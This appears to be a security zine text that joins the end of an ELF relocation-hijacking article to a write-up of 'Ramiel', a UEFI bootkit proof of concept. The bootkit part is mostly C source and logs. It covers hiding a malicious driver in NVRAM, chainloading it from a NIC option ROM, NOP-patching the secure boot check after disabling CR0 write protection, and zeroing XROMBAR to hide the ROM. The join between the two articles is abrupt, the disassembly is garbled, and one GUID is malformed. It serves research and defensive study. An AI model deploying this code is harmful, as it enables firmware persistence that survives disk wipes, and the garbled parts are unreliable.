[sad0p@Arch-Deliberate experimental]$ readelf -r helloworld64_dynamic

Relocation section '.rela.dyn' at offset 0x558 contains 8 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000003dd0  000000000008 R_X86_64_RELATIVE                    1130
000000003dd8  000000000008 R_X86_64_RELATIVE                    10e0
000000004010  000000000008 R_X86_64_RELATIVE                    4010
000000003fc0  000100000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
000000003fc8  000200000006 R_X86_64_GLOB_DAT 0000000000000000 _ITM_deregisterTM[...] + 0
000000003fd0  000400000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000003fd8  000500000006 R_X86_64_GLOB_DAT 0000000000000000 _ITM_registerTMCl[...] + 0
000000003fe0  000600000006 R_X86_64_GLOB_DAT 0000000000000000 __cxa_finalize@GLIBC_2.2.5 + 0

Relocation section '.rela.plt' at offset 0x618 contains 1 entry:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000004000  000300000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0
[sad0p@Arch-Deliberate experimental]$ readelf -s helloworld64_dynamic | grep 1130
    10: 0000000000001130     0 FUNC    LOCAL  DEFAULT   14 frame_dummy
[sad0p@Arch-Deliberate experimental]$ readelf -s helloworld64_dynamic | grep 10e0
     7: 00000000000010e0     0 FUNC    LOCAL  DEFAULT   14 __do_global_dtors_aux
[sad0p@Arch-Deliberate experimental]$ readelf -s helloworld64_dynamic | grep 4010
    27: 0000000000004010     0 OBJECT  GLOBAL HIDDEN    24 __dso_handle
[sad0p@Arch-Deliberate experimental]$


There are two solutions I can think of (one of which is implemented in d0zer). The first is to check whether the
offset falls within the *.init_array* section, since that section only holds function pointers, so its entries only
point to code. The following screenshot illustrates the function in d0zer that does just that.


withInSectionVirtualAddrSpace(sectionName 
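
The same range check can be sketched in C. This is only an illustration under stated assumptions, not d0zer's own code: the names within_section and find_init_array_reloc are hypothetical, and the caller is assumed to have already located the *.init_array* section header and the RELA records.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

/* Return 1 if vaddr lies inside the address range covered by shdr. */
int within_section(const Elf64_Shdr *shdr, uint64_t vaddr)
{
    return vaddr >= shdr->sh_addr && vaddr - shdr->sh_addr < shdr->sh_size;
}

/*
 * Walk `count` RELA records and return the index of the first
 * R_X86_64_RELATIVE record whose target slot is inside .init_array,
 * or -1 if no such record exists. (Hypothetical helper.)
 */
long find_init_array_reloc(const Elf64_Rela *rela, size_t count,
                           const Elf64_Shdr *init_array)
{
    assert(rela != NULL && init_array != NULL);
    for (size_t i = 0; i < count; i++) {
        if (ELF64_R_TYPE(rela[i].r_info) != R_X86_64_RELATIVE)
            continue; /* GLOB_DAT, JUMP_SLOT, ... are not candidates */
        if (within_section(init_array, rela[i].r_offset))
            return (long)i;
    }
    return -1;
}
```

With the *helloworld64_dynamic* records shown earlier, and assuming *.init_array* is the 8-byte section at 0x3dd0, only the record at offset 0x3dd0 would be selected; the record at 0x4010 is rejected because its slot lives in a data section.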


The other solution requires us to check the symbol tables to make sure the associated symbol is of type *STT_FUNC*
(*FUNC* in readelf output). However, there is a drawback: it is not unusual for dynamically linked production
binaries to have their .symtab removed to decrease file size. Finally, statically compiled and linked binaries
(ELF type ET_EXEC) do not utilize relative relocations (R_X86_64_RELATIVE), so Relative Relocation
Poisoning/Hijacking will not work.
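
A minimal sketch of the symbol-table check, assuming the symbol table has already been read into memory. The function name addend_is_function is hypothetical; the types and macros come from *elf.h*.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Return 1 if some symbol of type STT_FUNC has a value equal to the
 * relocation addend, 0 otherwise. A stripped binary (no .symtab) simply
 * yields 0 for every addend, which is the drawback noted above.
 */
int addend_is_function(const Elf64_Sym *syms, size_t count, uint64_t addend)
{
    assert(syms != NULL || count == 0);
    for (size_t i = 0; i < count; i++) {
        if (syms[i].st_value == addend &&
            ELF64_ST_TYPE(syms[i].st_info) == STT_FUNC)
            return 1;
    }
    return 0;
}
```

Applied to the readelf output above, the addend 0x1130 (frame_dummy, FUNC) would pass, while 0x4010 (__dso_handle, OBJECT) would be rejected.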


I hope this helps demystify ELF binary infection, and informs efforts to both further the art of exploitation, and the
forensic analysis & defeat of malicious actors.


Credit - *To Alpinista for his edits.* 
Abstract:


The majority of UEFI bootkits persist within the EFI system partition. Disk persistence is usually not ideal as it is
easily detectable and cannot survive OS re-installations and disk wipes. Furthermore, for almost all platforms,
secure boot is configured to check the signatures of images stored on disk before they are loaded.


Recently, a new technique [6] of persisting in the option ROM of PCI cards was discovered. The technique allows
bootkits to survive OS re-installations and disk wipes. In the past, edk2 configured secure boot to allow unsigned
option ROMs to be executed [8], but this has since been patched for most platforms. PCI option ROM
persistence is not without limitations:

1. PCI option ROM is often small, usually within the range of ~32 - ~128 KB, providing little room for complex 
malware. 

2. PCI option ROM can be dumped trivially as it is mapped into memory. 


Ramiel attempts to mitigate these flaws. By leveraging the motherboard’s NVRAM, it can utilize ~256 KB of persistent
storage on certain systems, which is more than current option ROM bootkits can utilize. Ramiel is also difficult to
detect since it prevents option ROMs from being mapped into memory, and as vault7 [7] states: “there is no
way to enumerate NVRAM variables from the OS... you have to know the exact GUID and name of the variable to
even determine that it exists.” Ramiel is also able to tamper with secure boot status for certain hypervisors.


0. Overview 


The order in which sections are presented is the order in which Ramiel performs operations. 


1. Infection: 


1.1 Ramiel writes a malicious driver to NVRAM 
1.2 Ramiel writes chainloader to PCI option ROM 


2. Subsequent Boots: 
2.3 Ramiel patches secure boot check in LoadImage to chainload unsigned malicious driver
2.4 Ramiel prevents OPROM from being mapped into memory by Linux kernel
2.5 chainloader loads the malicious driver from NVRAM 


Misc: 
2.1 OVMF misconfiguration allows for unsigned PCI option ROMs to execute with secure boot enabled 
2.2 Overview of PCI device driver model 
2.6 Source debugging OVMF with gdb 


Initial Infection:
    OEM firmware update tool --> NIC PCI option ROM: chainloader driver
    dropper --> SetVariable() --> NVRAM: malicious driver (chunks)

Next Reboot:
    DXE dispatcher loads unsigned chainloader driver
    (ignores secure boot violation due to misconfiguration)
        |
        v
    chainloader: patch secureboot check in CoreLoadImage
    chainloader: zero XROMBAR
        |
        v
    chainloader: load malicious driver chunks from NVRAM
        |
        v
    malicious driver

Ramiel has not been tested on bare metal, although theoretically it should work with secure boot disabled.


1.0 Infection 


On the version of OVMF tested, QueryVariableInfo returned:


max variable storage: 262044 B, 262 KB 
remaining variable storage: 224808 B, 224 KB 
max variable size: 33732 B, 33 KB 


In order to utilize all 262 KB of NVRAM, the malicious driver must be broken into 33 KB chunks stored in separate
NVRAM variables. Since the size of the malicious driver is unknown to the chainloader, Ramiel creates a variable
called “guids” storing the GUIDs of all chunk variables. The GUID of the “guids” variable is fixed at compile time.
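
The chunking arithmetic can be sketched as follows. This is an illustration only, not Ramiel's dropper: chunk_count and chunk_len are hypothetical helpers, and max_chunk is assumed to be the usable payload size per variable (which may be somewhat smaller than the maximum variable size reported by QueryVariableInfo, depending on the firmware).

```c
#include <assert.h>
#include <stddef.h>

/* Number of NVRAM variables needed to hold `total` bytes. */
size_t chunk_count(size_t total, size_t max_chunk)
{
    assert(max_chunk > 0);
    return (total + max_chunk - 1) / max_chunk; /* ceiling division */
}

/* Length of chunk `index` (0-based): full-sized except possibly the last. */
size_t chunk_len(size_t total, size_t max_chunk, size_t index)
{
    assert(max_chunk > 0);
    size_t start = index * max_chunk;
    if (start >= total)
        return 0; /* index is past the end of the driver image */
    return (total - start < max_chunk) ? total - start : max_chunk;
}
```

For example, a hypothetical 100000-byte driver with max_chunk = 33732 needs three variables: two full chunks and one final chunk of 32536 bytes. The “guids” variable would then list three GUIDs.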


Example NVRAM layout:
GUID of guids (89547266-0460-43b3-9dfc-e4d627e6629) is known by the chainloader

guids -- 89547266-0460-43b3-9dfc-e4d627e6629
    0eb06226-a02e-49be-bd56-866b328b44a3
    c62104c3-0b2a-4c5a-9b1d-17780ebeaf9f
    b0d0f31d-88e0-4cbf-a589-ccc35e4569ab

0eb06226-a02e-49be-bd56-866b328b44a3
    <max var size chunk 1 of driver>

c62104c3-0b2a-4c5a-9b1d-17780ebeaf9f
    <max var size chunk 2 of driver>

b0d0f31d-88e0-4cbf-a589-ccc35e4569ab
    <max var size chunk 3 of driver>


runtime.c excerpt: 


struct stat stat;
int fd = open(argv[3], O_RDONLY);
fstat(fd, &stat);

uint8_t *buf = malloc(stat.st_size);
read(fd, buf, stat.st_size);

int attributes = EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS | \
                 EFI_VARIABLE_RUNTIME_ACCESS;
efi_guid_t guid;
efi_str_to_guid(argv[1], &guid);
ret = efi_set_variable(guid, argv[2], buf, stat.st_size, attributes, 777);
if (ret != 0)
    return -1;
To write the variables to NVRAM, Ramiel uses the libefivar library and its wrapper
for the UEFI runtime service SetVariable:


int efi_set_variable(efi_guid_t guid,
                     const char *name,
                     void *data,
                     size_t data_size,
                     uint32_t attributes);


Ramiel sets the attributes: 
EFI_VARIABLE_NON_VOLATILE to store the variable in NVRAM, 
EFI_VARIABLE_BOOTSERVICE_ACCESS so the chainloader may access it, and 
EFI_VARIABLE_RUNTIME_ACCESS to ensure the variable has been written. 


Importantly, EFI_VARIABLE_RUNTIME_ACCESS is unset during subsequent boots to prevent the variable from
being dumped from the OS even if its GUID is known.


Option ROM emulation in QEMU is as simple as passing a romfile= param to an emulated NIC device like so [1]:
-device e1000e,romfile=chainloader.efirom
For bare metal, it is usually possible to flash the PCI option ROM via OEM firmware update utilities like the Intel
Ethernet Flash Firmware Utility [9].


Ramiel currently does not implement utilizing such utilities to infect virtual machines that are passed healthy
romfiles. Ramiel requires an infected romfile to be passed to QEMU.


2.0 Subsequent Boots 


Option ROM verification behavior is controlled by a PCD value, PcdOptionRomImageVerificationPolicy, in the edk2
SecurityPkg package. The possible values for the PCD are:


## Pcd for OptionRom.
# Image verification policy settings:
    ALWAYS_EXECUTE                         0x00000000
    NEVER_EXECUTE                          0x00000001
    ALLOW_EXECUTE_ON_SECURITY_VIOLATION    0x00000002
    DEFER_EXECUTE_ON_SECURITY_VIOLATION    0x00000003
    DENY_EXECUTE_ON_SECURITY_VIOLATION     0x00000004
    QUERY_USER_ON_SECURITY_VIOLATION       0x00000005
gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x0 | UINT32 | 0x00000001


Microsoft recommends that platforms set this value to DENY_EXECUTE_ON_SECURITY_VIOLATION (0x04) [8];
however, on the latest version of edk2 the PCD is set to always execute for many OVMF platforms:


OvmfPkg/OvmfPkgIa32X64.dsc:653:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
OvmfPkg/AmdSev/AmdSevX64.dsc:525:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
OvmfPkg/IntelTdx/IntelTdxX64.dsc:512:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
OvmfPkg/XenPlatformPei/XenPlatformPei.inf:90:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy
OvmfPkg/Microvm/MicrovmX64.dsc:620:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
OvmfPkg/OvmfPkgIa32.dsc:641:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
OvmfPkg/Bhyve/BhyveX64.dsc:562:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
OvmfPkg/CloudHv/CloudHvX64.dsc:622:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
OvmfPkg/OvmfXen.dsc:508:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
OvmfPkg/OvmfPkgX64.dsc:674:
    gEfiSecurityPkgTokenSpaceGuid.PcdOptionRomImageVerificationPolicy | 0x00
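
To make the effect of the policy value concrete, here is a deliberately simplified model in C. It is not edk2 code: image_may_run is a hypothetical function, only the enum values are taken from the list above, and the non-trivial policies are all collapsed into "run only if verification succeeded".

```c
#include <assert.h>
#include <stdint.h>

/* Policy values as listed for PcdOptionRomImageVerificationPolicy. */
enum {
    ALWAYS_EXECUTE                      = 0x00000000,
    NEVER_EXECUTE                       = 0x00000001,
    ALLOW_EXECUTE_ON_SECURITY_VIOLATION = 0x00000002,
    DEFER_EXECUTE_ON_SECURITY_VIOLATION = 0x00000003,
    DENY_EXECUTE_ON_SECURITY_VIOLATION  = 0x00000004,
    QUERY_USER_ON_SECURITY_VIOLATION    = 0x00000005
};

/*
 * Simplified model: return 1 if an option ROM image would be started.
 * `signature_ok` is 1 when the image passed signature verification.
 */
int image_may_run(uint32_t policy, int signature_ok)
{
    assert(policy <= QUERY_USER_ON_SECURITY_VIOLATION);
    if (policy == ALWAYS_EXECUTE)
        return 1;          /* verification result is never consulted */
    if (policy == NEVER_EXECUTE)
        return 0;
    return signature_ok;   /* simplification for the remaining policies */
}
```

In this model, image_may_run(0x00, 0) is 1, which is the misconfiguration Ramiel relies on: an unsigned chainloader in the option ROM runs even with secure boot enabled. With the recommended 0x04, the same unsigned image is refused.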


During the DXE phase of EFI, the driver dispatcher will discover and dispatch all drivers it encounters, including
drivers stored in PCI option ROM.


From edk2 docs: “Drivers that follow the UEFI driver model are not allowed to touch any hardware in their driver
entry point. In fact, these types of drivers do very little in their driver entry point. They are required to register
protocol interfaces in the Handle Database and may also choose to register HII packages in the HII Database...” [13]


Register driver binding protocol in DriverEntry: 


EFI_DRIVER_BINDING_PROTOCOL gTestDriverBinding = {
    DriverSupported, DriverStart, DriverStop,
    0x01, NULL, NULL};


EFI_STATUS EFIAPI DriverEntry(IN EFI_HANDLE ImageHandle,
                              IN EFI_SYSTEM_TABLE *SystemTable) {
    gST = SystemTable;
    gBS = SystemTable->BootServices;
    gRT = SystemTable->RuntimeServices;
    gImageHandle = ImageHandle;

    EFI_STATUS status;

    status = EfiLibInstallDriverBindingComponentName2(
        ImageHandle,         // ImageHandle
        SystemTable,         // SystemTable
        &gTestDriverBinding, // DriverBinding
        ImageHandle,         // DriverBindingHandle
        NULL, NULL);

    return status;
}

From edk2 docs: “A PCI driver must implement the EFI_DRIVER_BINDING_PROTOCOL containing the Supported(),
Start(), and Stop() services. The Supported() service evaluates the ControllerHandle passed in to see if the
ControllerHandle represents a PCI device the PCI driver can manage.” [14]


Driver supported:


BOOLEAN Checke1000eNIC(EFI_HANDLE Controller,
                       EFI_DRIVER_BINDING_PROTOCOL **This) {
    EFI_STATUS status = EFI_SUCCESS;
    EFI_PCI_IO_PROTOCOL *PciIo;

    PCI_TYPE00 Pci;
    status = gBS->OpenProtocol(Controller, &gEfiPciIoProtocolGuid,
                               (VOID **) &PciIo, (*This)->DriverBindingHandle,
                               Controller, EFI_OPEN_PROTOCOL_BY_DRIVER);
    if (EFI_ERROR(status) || PciIo == NULL) {
        return FALSE;
    }

    // Read the PCI configuration header of the controller
    status = PciIo->Pci.Read(PciIo,
                             EfiPciIoWidthUint32,
                             0,
                             sizeof(Pci) / sizeof(UINT32),
                             &Pci);

    gBS->CloseProtocol(Controller, &gEfiPciIoProtocolGuid,
                       (*This)->DriverBindingHandle, Controller);

    if (status == EFI_SUCCESS) {
        ...


Originally, Ramiel utilized a manual mapper similar to shim to chainload the malicious driver without triggering a 
secure boot violation. However, it is far simpler to bypass secureboot status by patching a check in DxeCore.efi. 


When LoadImage is called on an unsigned image, the debug log in QEMU will show this message: 


[Security] 3rd party image[0] can be loaded after EndOfDxe: MemoryMapped(0x0, ...
DxeImageVerificationLib: Image is not signed and SHA256 hash of image is not found
in DB/DBX.
The image doesn't pass verification: MemoryMapped(0x0,0x7D632000,0x7D6340C0)


The message is printed by DxeImageVerificationHandler in
SecurityPkg/Library/DxeImageVerificationLib/DxeImageVerificationLib.c:


EFI_STATUS
EFIAPI
DxeImageVerificationHandler (
...
    DEBUG((DEBUG_INFO, "DxeImageVerificationLib: \
Image is not signed and %s hash of image is not found in DB/DBX.\n",
           mHashTypeStr));


Setting a breakpoint at DxeImageVerificationHandler entry and backtracing shows:


Thread 1 hit Breakpoint 1, DxeImageVerificationHandler ...
(gdb) bt
#0 DxeImageVerificationHandler ...
#1 0x000000007e2af95b in ExecuteSecurity2Handlers ...
#2 ExecuteSecurity2Handlers ...
#3 0x000000007e27b22d in Security2StubAuthenticate ...
#4 0x000000007ef94dee in CoreLoadImageCommon.constprop.0 ...
    at ... edk2/MdeModulePkg/Core/Dxe/Image/Image.c:1273
#5 0x000000007ef7b88e in CoreLoadImage ...
    at ... edk2/MdeModulePkg/Core/Dxe/Image/Image.c:1542


Ramiel patches this check in CoreLoadImageCommon with nops.


MdeModulePkg/Core/Dxe/Image/Image.c: 


CoreLoadImageCommon (
...
1269> if (gSecurity2 != NULL) {
          SecurityStatus = gSecurity2->FileAuthentication (
                                         gSecurity2,
                                         OriginalFilePath,
                                         FHand.Source,
                                         FHand.SourceSize,
                                         BootPolicy
                                         );
...
1310> if (EFI_ERROR (SecurityStatus) && (SecurityStatus != EFI_SECURITY_VIOLATION)) {
          if (SecurityStatus == EFI_ACCESS_DENIED) {
              *ImageHandle = NULL;
          }
          Status = SecurityStatus;
          Image = NULL;
          goto Done;
      }


It is possible to find the address corresponding to a line of code via setting hardware breakpoints. Setting hardware 
breakpoints at lines 1269 and 1322 shows the start and end addresses of the code which Ramiel must patch. As 
there is no ASLR, these addresses do not change unless DxeCore.efi is recompiled. 


hw breakpoint keep y <MULTIPLE>
y 0x000000007ef94dbd in CoreLoadImageCommon.constprop.0 at
edk2/MdeModulePkg/Core/Dxe/Image/Image.c:1269 inf 1

hw breakpoint keep y <MULTIPLE>
y 0x000000007ef94eab in CoreLoadImageCommon.constprop.0 at
... edk2/MdeModulePkg/Core/Dxe/Image/Image.c:1327 inf 1


Disassembly of check in CoreLoadImageCommon.constprop.0 before patch_sb:


0x000000007ef94dbd <+2721>: 84 d2 00 00 0xd284(%rip),%
0x000000007ef94dc4 <+2728>: %rax,%
0x000000007ef94dc7 <+2731>: 0x7ef94e36
...
0x000000007ef94e9f <+2947>: 00 00 00 00 $0x0,(% )
0x000000007ef94ea6 <+2954>: 0x7ef9523b
0x000000007ef94eab <+2959>: 20 $0x20,%


Any write protection implemented via page tables is bypassed trivially with the CR0 WP bit trick:


VOID clear_cr0_wp() {
    // Clear CR0.WP (bit 16) so ring 0 may write to read-only pages
    AsmWriteCr0(AsmReadCr0() & ~(1UL << 16));
}

VOID set_cr0_wp() {
    // Restore CR0.WP
    AsmWriteCr0(AsmReadCr0() | (1UL << 16));
}


It is possible to pattern scan memory for the check after finding the base address of DxeCore.efi via
enumerating ImageHandles in the handle database. Ramiel simply hardcodes the start and end address of where it
should patch:


#define PATCH_START 0x000000007ef94dbdu
#define PATCH_END 0x000000007ef94eabu


VOID patch_sb() {
    clear_cr0_wp();
    // Overwrite [PATCH_START, PATCH_END) with NOPs (0x90)
    SetMem((VOID *) PATCH_START, PATCH_END - PATCH_START, 0x90);
    set_cr0_wp();
}
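
The pattern-scanning alternative mentioned above could look roughly like the following. This is a generic sketch, not part of Ramiel: pattern_scan is a hypothetical helper, and the byte pattern and mask a caller supplies would have to be derived from the actual DxeCore.efi build being targeted.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Return a pointer to the first position in [base, base + size) where every
 * pattern byte with a non-zero mask byte matches, or NULL if there is none.
 * A zero mask byte acts as a wildcard (e.g. for RIP-relative displacements
 * that change between builds).
 */
const uint8_t *pattern_scan(const uint8_t *base, size_t size,
                            const uint8_t *pattern, const uint8_t *mask,
                            size_t pattern_len)
{
    assert(base != NULL && pattern != NULL && mask != NULL);
    if (pattern_len == 0 || pattern_len > size)
        return NULL;
    for (size_t i = 0; i + pattern_len <= size; i++) {
        size_t j = 0;
        while (j < pattern_len && (!mask[j] || base[i + j] == pattern[j]))
            j++;
        if (j == pattern_len)
            return base + i;
    }
    return NULL;
}
```

Compared with hardcoded addresses, a scan like this would survive a recompiled DxeCore.efi as long as the instruction sequence around the check stays the same, at the cost of having to pick a pattern that is unique within the image.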


Disassembly of check in CoreLoadImageCommon.constprop.0 after patch_sb:


0x000000007ef94dbd <+2721>: nop
0x000000007ef94dbe <+2722>: nop
0x000000007ef94dbf <+2723>: nop
...
0x000000007ef94ea9 <+2957>: nop
0x000000007ef94eaa <+2958>: nop
0x000000007ef94eab <+2959>:


Ramiel calls LoadImage successfully on an unsigned image:
QEMU debug log:


Loading driver at 0x0007D62F000 EntryPoint=0x0007D63045A helloworld_driver.efi
InstallProtocolInterface: BC62157E-3E33-4FEC-9920-2D3B36D750DF 7D635798
ProtectUefiImageCommon - 0x7D635940
  - 0x000000007D62F000 - 0x00000000000020C0


$ lspci -vv
00:04.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection
    Subsystem: Intel Corporation 82574L Gigabit Network Connection
    ...
    Region 0: Memory at c0860000 (32-bit, non-prefetchable) [size=128K]
    Region 1: Memory at c0840000 (32-bit, non-prefetchable) [size=128K]
    Region 2: I/O ports at 6060 [size=32]
    Region 3: Memory at c0880000 (32-bit, non-prefetchable) [size=16K]
    Expansion ROM at 80050000 [disabled] [size=32K]
    Capabilities: <access denied>
    Kernel driver in use: e1000e
    Kernel modules: e1000e


$ cd /sys/devices/pci0000:00/0000:00:04.0
$ echo 1 | sudo tee rom
$ sudo dd if=rom of=/tmp/oprom.bin
$ file /tmp/oprom.bin
/tmp/oprom.bin: BIOS (ia32) ROM Ext. (56*512)


However, “There is a kernel boot parameter, pci=norom, that is intended to disable the kernel’s resource assignment 
actions for Expansion ROMs that do not already have BIOS assigned address ranges...” which “...only works if the 
Expansion ROM BAR is set to ‘0’ by the BIOS before hand-off.” [10] 


In order to prevent option ROM from being dumped, Ramiel clears XROMBAR in the PCI configuration header of 
the NIC and passes pci=norom to the kernel. In DriverStart, Ramiel opens the EFI_PCI_IO_PROTOCOL associated 
with the NIC controller and passes it to clear_oprom_bar: 


EFI_PCI_IO_PROTOCOL *PciIo;
status = gBS->OpenProtocol(Controller, &gEfiPciIoProtocolGuid,
                           (VOID **) &PciIo, This->DriverBindingHandle,
                           Controller, EFI_OPEN_PROTOCOL_BY_DRIVER);
if (EFI_ERROR(status) || PciIo == NULL) {
    return status;
}

status = clear_oprom_bar(PciIo);


In clear_oprom_bar, Ramiel writes all zeros to the XROMBAR register (offset 0x30 within the PCI configuration 
headers) of the controller: 


UINT32 zero = 0x00000000;
status = PciIo->Pci.Write(PciIo,
                          EfiPciIoWidthUint32,
                          0x30,   // XROMBAR offset in the configuration header
                          1,      // write a single UINT32
                          &zero);
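
For reference, the layout of the register being cleared can be sketched like this. The macro and function names are hypothetical; the bit positions follow the standard PCI type 0 header layout (bit 0 enables ROM decoding, bits 31:11 hold the base address).

```c
#include <assert.h>
#include <stdint.h>

#define XROMBAR_OFFSET    0x30u        /* offset within a type 0 config header */
#define XROMBAR_ENABLE    0x00000001u  /* bit 0: expansion ROM decoding enabled */
#define XROMBAR_ADDR_MASK 0xFFFFF800u  /* bits 31:11: expansion ROM base address */

/* Return 1 if the device currently decodes its expansion ROM. */
int xrombar_enabled(uint32_t xrombar)
{
    return (xrombar & XROMBAR_ENABLE) != 0;
}

/* Return the ROM base address encoded in the register (0 if unassigned). */
uint32_t xrombar_base(uint32_t xrombar)
{
    return xrombar & XROMBAR_ADDR_MASK;
}
```

A register value of 0x80050000 decodes to the "Expansion ROM at 80050000 [disabled]" line in the lspci output above. After Ramiel writes zero, the base is 0, so with pci=norom the kernel leaves the ROM without an address.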


Afterwards, lspci no longer displays the expansion ROM field and the ROM cannot be dumped without memory scanning:


00:04.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection
    Subsystem: Intel Corporation 82574L Gigabit Network Connection
    ...
    Region 0: Memory at c0860000 (32-bit, non-prefetchable) [size=128K]
    Region 1: Memory at c0840000 (32-bit, non-prefetchable) [size=128K]
    Region 2: I/O ports at 6060 [size=32]
    Region 3: Memory at c0880000 (32-bit, non-prefetchable) [size=16K]
    Capabilities: <access denied>
    Kernel driver in use: e1000e
    Kernel modules: e1000e


To reassemble the malicious driver image, Ramiel first calls GetVariable on the “guids” variable, then calls
GetVariable on every GUID stored in it and copies the chunks to a buffer:


// TODO: remove runtime access flag from vars.


#define GUIDS_VAR_NAME L"guids"
#define GUIDS_VAR_GUID {0xBFB35F7E, 0xFC44, 0x41AE, \
    {0x7C, 0xD9, 0x68, 0xA8, 0x01, 0x02, 0xB9, 0xD0}}


UINTN parse_guids(CHAR16 ***var_names_ptr, UINT8 *buf, UINTN bufsize) {
    // buf holds nguids fixed-length GUID strings stored back to back
    UINTN nguids = (bufsize / sizeof(CHAR16)) / GUID_LEN;
    CHAR16 **guids = AllocateZeroPool(nguids * sizeof(CHAR16 *));
    *var_names_ptr = guids;

    for (UINTN i = 0; i < nguids; i++) {
        // One extra CHAR16 keeps each copied string NUL-terminated
        CHAR16 *tmp = AllocateZeroPool((GUID_LEN * sizeof(CHAR16)) + sizeof(CHAR16));
        guids[i] = tmp;
        CopyMem(tmp,
                buf + (i * GUID_LEN * sizeof(CHAR16)), GUID_LEN * sizeof(CHAR16));
    }

    return nguids;
}


EFI_STATUS
EFIAPI
nvram_chainload() {
    EFI_STATUS status;

    UINT8 *buf;
    UINTN bufsize = 0;
    EFI_GUID guids_var_guid = GUIDS_VAR_GUID;
    // First call with a NULL buffer only queries the size of "guids"
    gRT->GetVariable(
        GUIDS_VAR_NAME,
        &guids_var_guid,
        NULL,
        &bufsize,
        NULL);

    buf = AllocateZeroPool(bufsize);

    gRT->GetVariable(
        GUIDS_VAR_NAME,
        &guids_var_guid,
        NULL,
        &bufsize,
        buf);

    CHAR16 **var_names;
    UINTN nguids = parse_guids(&var_names, buf, bufsize);

    EFI_GUID *guids = AllocateZeroPool(nguids * sizeof(EFI_GUID));

    for (UINTN i = 0; i < nguids; i++) {
        StrToGuid(var_names[i], &guids[i]);
    }

    UINT64 size = 0;
    UINT64 *sizes = AllocateZeroPool(nguids * sizeof(UINT64));

    // Query the size of every chunk to get the total image size
    for (UINTN i = 0; i < nguids; i++) {
        gRT->GetVariable(
            var_names[i],
            &(guids[i]),
            NULL,
            &(sizes[i]),
            NULL);
        size += sizes[i];
    }

    UINT8 *application_ptr = AllocatePages(EFI_SIZE_TO_PAGES(size));

    // Copy the chunks back to back into the image buffer
    UINT64 offset = 0;
    for (UINTN i = 0; i < nguids; i++) {
        gRT->GetVariable(
            var_names[i],
            &(guids[i]),
            NULL,
            &(sizes[i]),
            application_ptr + offset);
        offset += sizes[i];
    }

    MEMORY_DEVICE_PATH mempath = MemoryDevicePathTemplate;
    mempath.Node1.StartingAddress = (EFI_PHYSICAL_ADDRESS) (UINTN) application_ptr;
    mempath.Node1.EndingAddress = \
        (EFI_PHYSICAL_ADDRESS) ((UINTN) application_ptr) + size;

    EFI_HANDLE NewImageHandle;
    status = gBS->LoadImage(
        0,
        gImageHandle,
        (EFI_DEVICE_PATH_PROTOCOL *) &mempath,
        application_ptr,
        size,
        &NewImageHandle);
    if (EFI_ERROR(status)) {
        return status;
    }

    status = gBS->StartImage(NewImageHandle, NULL, NULL);
    if (EFI_ERROR(status)) {
        return status;
    }

    return status;
}


Then it calls LoadImage on a memory device path pointing to the buffer [12]:


typedef struct {
    MEMMAP_DEVICE_PATH Node1;
    EFI_DEVICE_PATH_PROTOCOL End;
} MEMORY_DEVICE_PATH;


STATIC CONST MEMORY_DEVICE_PATH MemoryDevicePathTemplate =
{
    {
        {
            HARDWARE_DEVICE_PATH,
            HW_MEMMAP_DP,
            {
                (UINT8) (sizeof (MEMMAP_DEVICE_PATH)),
                (UINT8) ((sizeof (MEMMAP_DEVICE_PATH)) >> 8),
            },
        },
        ...
    },
    {
        END_DEVICE_PATH_TYPE,
        END_ENTIRE_DEVICE_PATH_SUBTYPE,
        { sizeof (EFI_DEVICE_PATH_PROTOCOL), 0 }
    }
};


MEMORY_DEVICE_PATH mempath = MemoryDevicePathTemplate;
mempath.Node1.StartingAddress = (EFI_PHYSICAL_ADDRESS) (UINTN) application_ptr;
mempath.Node1.EndingAddress = (EFI_PHYSICAL_ADDRESS) ((UINTN) application_ptr) + size;

EFI_HANDLE NewImageHandle;
status = gBS->LoadImage(
    0,
    gImageHandle,
    (EFI_DEVICE_PATH_PROTOCOL *) &mempath,
    application_ptr,
    size,
    &NewImageHandle);


com1 log:


[ramiel]: nic found @ DevicePath: PciRoot(0x0)/Pci(0x4,0x0)
[ramiel]: print_var_info - max_var_storage -> 262044 B
[ramiel]: print_var_info - remaining_var_storage -> 224808 B
[ramiel]: print_var_info - max_var_size -> 33732 B
[ramiel]: DriverStart - vendor id, device id -> 8086, 10D3
[ramiel]: DriverStart - xrombar -> 0
[ramiel]: DriverStart - command register -> 7
[ramiel]: patch_sb - patching secureboot check from -> 7EF94DBD to 7EF94EAB...
[ramiel]: patch_sb - completed
[ramiel]: nvram_chainload - guid 02015480-B875-42CC-B73C-7CD6D7A140D5
[ramiel]: nvram_chainload - LoadImage of target completed
helloworld !! :D
[ramiel]: nvram_chainload - StartImage completed


1. Follow the Debian wiki instructions to set up a VM with secure boot [15]


2. Compile OVMF with -D SECURE_BOOT_ENABLE 


3. Copy OVMF_VARS.fd and OVMF_CODE.fd to the secureboot-vm directory 


4. Run: 
$ ./start-vm.sh 


5. Exit the VM, then run: 
$ ./gen_symbol_offsets.sh > gdbscript 
